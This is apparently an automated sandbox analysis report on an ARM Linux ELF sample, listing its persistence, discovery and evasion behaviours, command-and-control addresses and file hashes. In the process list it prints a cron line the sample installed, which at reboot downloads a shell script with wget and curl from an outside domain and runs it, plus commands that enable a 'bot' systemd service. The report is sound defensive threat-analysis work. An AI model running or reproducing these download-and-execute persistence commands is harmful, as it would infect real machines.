Malware Analysis Report

2024-11-30 18:26

Sample ID 241104-al64dsycnc
Target arm7-20241104-0018.elf
SHA256 3acae58d3eee41939f3d1b9f96bceec757ab7320a7dcb2e50954a7c71e437681
Tags: defense_evasion discovery execution persistence privilege_escalation
Score: 7/10

Table of Contents

Analysis Overview
MITRE ATT&CK
  Enterprise Matrix V15
Analysis: static1
  Detonation Overview
  Signatures
Analysis: behavioral1
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files

Analysis Overview

Score: 7/10

SHA256: 3acae58d3eee41939f3d1b9f96bceec757ab7320a7dcb2e50954a7c71e437681

Threat Level: Shows suspicious behavior

The file arm7-20241104-0018.elf was found to show suspicious behavior.

Malicious Activity Summary

Tags: defense_evasion discovery execution persistence privilege_escalation

Renames itself

Unexpected DNS network traffic destination

File and Directory Permissions Modification

Modifies systemd

Creates/modifies Cron job

Changes its process name

Command and Scripting Interpreter: Unix Shell

Reads runtime system information

Enumerates kernel/hardware configuration

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2024-11-04 00:19

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2024-11-04 00:19
Reported: 2024-11-04 00:21
Platform: debian9-armhf-20240611-en
Max time kernel: 139s
Max time network: 145s

Command Line

[/tmp/arm7-20241104-0018.elf]

Signatures

File and Directory Permissions Modification

Tags: defense_evasion

Description | Indicator | Process | Target
N/A | N/A | /bin/sh | N/A

Renames itself

Description | Indicator | Process | Target
N/A | N/A | /tmp/arm7-20241104-0018.elf | N/A

Unexpected DNS network traffic destination

Description | Indicator | Process | Target
Destination IP | 5.161.109.23 | N/A | N/A
Destination IP | 139.84.165.176 | N/A | N/A
Destination IP | 137.220.52.23 | N/A | N/A
Destination IP | 152.53.15.127 | N/A | N/A

Creates/modifies Cron job

Tags: execution persistence privilege_escalation

Description | Indicator | Process | Target
File opened for modification | /var/spool/cron/crontabs/tmp.vk0Due | /usr/bin/crontab | N/A

Modifies systemd

Tags: persistence privilege_escalation

Description | Indicator | Process | Target
File opened for modification | /lib/systemd/system/bot.service | /tmp/arm7-20241104-0018.elf | N/A

Changes its process name

Description | Indicator | Process | Target
Changes the process name, possibly in an attempt to hide itself | /bin/busybox ntpd | /tmp/arm7-20241104-0018.elf | N/A

Command and Scripting Interpreter: Unix Shell

Tags: execution

Description | Indicator | Process | Target
N/A | N/A | /bin/sh | N/A
N/A | N/A | /bin/sh | N/A

Enumerates kernel/hardware configuration

Tags: discovery

Description | Indicator | Process | Target
File opened for reading | /sys/fs/kdbus/0-system/bus | /bin/systemctl | N/A

Reads runtime system information

Tags: discovery

Description | Indicator | Process | Target
File opened for reading | /proc/mounts | /tmp/arm7-20241104-0018.elf | N/A
File opened for reading | /proc/filesystems | /usr/bin/crontab | N/A
File opened for reading | /proc/filesystems | /usr/bin/crontab | N/A
File opened for reading | /proc/filesystems | /bin/systemctl | N/A
File opened for reading | /proc/self/stat | /bin/systemctl | N/A
File opened for reading | /proc/1/environ | /bin/systemctl | N/A
File opened for reading | /proc/cmdline | /bin/systemctl | N/A

Processes

/tmp/arm7-20241104-0018.elf

[/tmp/arm7-20241104-0018.elf]

/bin/sh

[/bin/sh -c (crontab -l ; echo "@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh") | crontab -]

/usr/bin/crontab

[crontab -]

/usr/bin/crontab

[crontab -l]

/bin/sh

[/bin/sh -c /sbin/initctl start bot]

/sbin/initctl

[/sbin/initctl start bot]

/bin/sh

[/bin/sh -c /bin/systemctl enable bot]

/bin/systemctl

[/bin/systemctl enable bot]

Network

Country | Destination | Domain | Proto
US | 5.161.109.23:53 | kingstonwikkerink.dyn | udp
IN | 139.84.165.176:53 | kingstonwikkerink.dyn | udp
CA | 137.220.52.23:53 | kingstonwikkerink.dyn | udp
DE | 152.53.15.127:53 | kingstonwikkerink.dyn | udp
HK | 193.233.193.45:21839 | kingstonwikkerink.dyn | tcp

Files

/var/spool/cron/crontabs/tmp.vk0Due

MD5 6834e3c196a6500f6580688b1dacc988
SHA1 195d34d068026784f01fd201c2a31452274b6326
SHA256 ab36c9cd44fe9af93990e477994623cac5cfa400abf79321d95c524a988ee8db
SHA512 622319261091b9218d24e9baea929a7008f3f5881d17ae1b1ff3f2669767b4c3a045e80c561a7b3dae9f6cf847e76029ab14a22c592b287e5988122481d7ac83

/etc/init/bot.conf

MD5 9722585f219a220a4dc2a0c49bd3b019
SHA1 ffba476658ea681147c570c6f2b16a79e7d38e19
SHA256 bb41836a1f2e11795c52739e7434247d90c0f8d391afe759598baa06e3657a8d
SHA512 77f16a70995a2650a397661d7b9ce3a83f4a5c01dc6ebc5e02b60a41d425246d37ab49478dc38ee3fc956775d90e9c86f911e0ac5e5df6e142bcc82f8601d6e4

/lib/systemd/system/bot.service

MD5 a4e30f6ce6fb6cf00e133f3c93fb5449
SHA1 67b7de93a672ada4abfe11e339dc2e270c61b69d
SHA256 a911f4bb5c69ad831fd6dc9004e52e656a846b2d7cbf152ab80c9b3928062ede
SHA512 893cda7cdcb75aceef89c64a38004feff8e5867e7bc76c622a49adfbff3fbb2c7916de6165ed4c43b4c7dabb5b56271e5a1b8a08d02b84389da92ec177289c25